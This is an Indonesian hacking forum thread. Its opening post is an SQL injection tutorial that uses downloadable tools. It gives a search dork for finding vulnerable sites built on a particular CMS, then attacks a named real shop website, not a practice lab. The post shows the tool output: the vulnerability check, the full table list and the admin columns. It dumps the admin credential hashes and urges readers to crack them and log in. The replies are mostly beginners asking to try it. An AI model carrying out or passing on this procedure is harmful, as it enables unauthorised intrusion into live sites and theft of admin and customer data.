Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Tutorial SQL Injection - Panduan Praktis dengan Tool

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Tutorial SQL Injection - Panduan Praktis dengan Tool

Postby poni » Sun May 30, 2010 7:39 pm

Tool yang anda butuhkan untuk mempelajari teknik SQL Injection dibawah ini adalah
[-]XCode SQL Injection/LFI/XSS/Webshell scanner
Code: Select all
http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/

[-]Reiluke SQLi helper Vers 2.7
Code: Select all
http://www.ziddu.com/download/10062751/sqliHelper2.7.zip.html


Sebagai percobaan, kita gunakan kelemahan sql injection pada website yang menggunakan produk
CMS The iceberg milik http://www.imagetraders.com.au dengan Dork = details.php?p_id= 'Design & SEO by Image Traders Pty Ltd' (baca thread : http://forum.xcode.or.id/viewtopic.php?f=99&t=39284 ).
jalankan Reiluke SQL Injection/XXS/RFI/LFI scanner dan masukkan dork tersebut.
Image
Tunggu beberapa saat dan kemudian ditemukan 112 web yang akan di test bug sqli

Klik "Test Sites" dan tunggu proses scanning
Image
Di kolom Vulnerable List akan menampilkan sejumlah website yang bisa diijeksi dengan script racun SQL

Mari kita coba ekploitasi salah satu website tersebut. Jalankan Reiluke SQLi helper Vers 2.7 dan sebagai percobaan adalah http://www.kincclothing.com/goods.php?p_id=41. Klik "Inject" dan tunggu beberapa saat.

Image
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 4
Check No. of Columns - finished
Looking for larget text visible column
Col num 1 found
Check if supports union
Check if supports union - finished
Check Current user
Check Current user - finished
Check if database version
Check if database version - finished
Check Current Database
Check current database - finished
Checking LoadFile
Check Load File - finished
Mysql version 5 OK - Please Get Database
Tool ini mendeteksi bahwa website tersebut bisa di-injeksi. kita bisa mendapatkan informasi lebih mendalam dari website tsb. sekarang klik 'Get database' untuk mendapatkan informasi database website tsb.

Image
[1] Setelah muncul information_schema dan database dengan nama : kincc2_zc1 ,
[2] Arahkan Mouse dan pilih kincc2_zc1 lalu klik 'Get Tables' dan kemudian struktur tabel dalam database tersebut akan didapatkan sbb:
zen_admin
users
zen_address_book
zen_address_format
zen_admin
zen_admin_activity_log
zen_authorizenet
zen_banners
zen_banners_history
zen_categories
zen_categories_description
zen_configuration
zen_configuration_group
zen_counter
zen_counter_history
zen_countries
zen_coupon_email_track
zen_coupon_gv_customer
zen_coupon_gv_queue
zen_coupon_redeem_track
zen_coupon_restrict
zen_coupons
zen_coupons_description
zen_currencies
zen_customers
zen_customers_basket
zen_customers_basket_attributes
zen_customers_info
zen_customers_wishlist
zen_db_cache
zen_email_archive
zen_ezpages
zen_featured
zen_files_uploaded
zen_geo_zones
zen_get_terms_to_filter
zen_group_pricing
zen_languages
zen_layout_boxes
zen_manufacturers
zen_manufacturers_info
zen_media_clips
zen_media_manager
zen_media_to_products
zen_media_types
zen_meta_tags_categories_description
zen_meta_tags_products_description
zen_music_genre
zen_newsletters
zen_orders
zen_orders_products
zen_orders_products_attributes
zen_orders_products_download
zen_orders_status
zen_orders_status_history
zen_orders_total
zen_paypal
zen_paypal_payment_status
zen_paypal_payment_status_history
zen_paypal_session
zen_product_music_extra
zen_product_type_layout
zen_product_types
zen_product_types_to_category
zen_products
zen_products_attributes
zen_products_attributes_download
zen_products_description
zen_products_discount_quantity
zen_products_notifications
zen_products_options
zen_products_options_types
zen_products_options_values
zen_products_options_values_to_products_options
zen_products_to_categories
zen_project_version
zen_project_version_history
zen_query_builder
zen_record_artists
zen_record_artists_info
zen_record_company
zen_record_company_info
zen_reviews
zen_reviews_description
zen_salemaker_sales
zen_sessions
zen_specials
zen_tax_class
zen_tax_rates
zen_template_select
zen_upgrade_exceptions
zen_whos_online
zen_zones
zen_zones_to_geo_zones
[3] Setelah Tabel diatas muncul. pilih tabel Zen_admin dan klik 'Get Columns' untuk mendapatkan informasi kolom pada tabel tsb. anda akan mendapatkan kolom :
admin_name
admin_email
admin_pass
admin_level
Kolom diatas berisi informasi admin login dan password.

Image
[4]Blok keempat kolom tsb: admin_name, admin_email, admin_pass, admin_level dan klik 'Dump Now'
Admin beserta Password akan anda dapatkan dalam bentuk Hash yang telah dienkripsi.

yang perlu anda lanjutkan sendiri adalah mencrack enkripsi tersebut, kemudian menemukan halaman login dan masuk ke website.

Selamat berusaha
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby demonbrando » Sun May 30, 2010 11:42 pm

pusing..... :mati: :mati:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby shad.hckr » Sun May 30, 2010 11:46 pm

@mas demon..
kalo tau dasarnya pasti gak pusing kk.. :pusing: :pusing: :pusing:
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby demonbrando » Sun May 30, 2010 11:56 pm

@mas poni ijin donlod toolsnya yah,buat saya plajari... :devil :devil

@mas shad.hckr saya masih newbie bang :circle: makanya masih kurang ngerti :pusing: tapi saya mohon bantuanya sama master" disini untuk belajar lagi :kaca: ...mohon bimbinganya yah om shad.hckr? :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby shad.hckr » Mon May 31, 2010 12:01 am

dulu juga saya kayak gitu kk.. pusing ngeliatnya.. tapi kalo pusing cuman dibiarin aja gak bakal mudeng ntar... mending sambil dicoba.. trial n error pak...
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby demonbrando » Mon May 31, 2010 12:07 am

iyah setuju om shad. klo pusing dibiarin aja malah jadi gag ngerti om :love: ...makanya saya blajar tools ini dan semangat dan tdk menyerah... :gebrak:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby vodork » Mon May 31, 2010 1:54 am

aduh pusing om pon :mati:
cara makenya gimana ya :mati:
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.
User avatar
vodork
 
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby 3xtr3m3b0y » Mon May 31, 2010 7:23 am

shad.hckr wrote:@mas demon..
kalo tau dasarnya pasti gak pusing kk.. :pusing: :pusing: :pusing:


Nah itu dia masalahnya Om shad.hckr, jarang ada yg bahas hal-hal mendasar di sini, rata2 semuanya serba instan, kasian temen2 pemula jika selalu disuguhi hal2 instan. Ditambah lagi temen2 pemula gak mau tau hal2 mendasar dulu, maunya langsung ces plang...Maka sempurnalah hidup ini dgn hal2 instan... :putusasa:
...n0 l1m17...
User avatar
3xtr3m3b0y
 
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby Nol Sembilan Tiga » Mon May 31, 2010 9:45 am

Ijin nyoba om poni... :love: :love:
-==Hanya Ingin belajar dan belajar==-
User avatar
Nol Sembilan Tiga
 
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0

Re: SQL Injection - Panduan Praktis dengan menggunakan Tool

Postby shinichi81 » Mon May 31, 2010 9:58 am

waduh bos poni,ngeluarin jurus andalannya euy heheheh..........
............make a wish............
User avatar
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 19 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id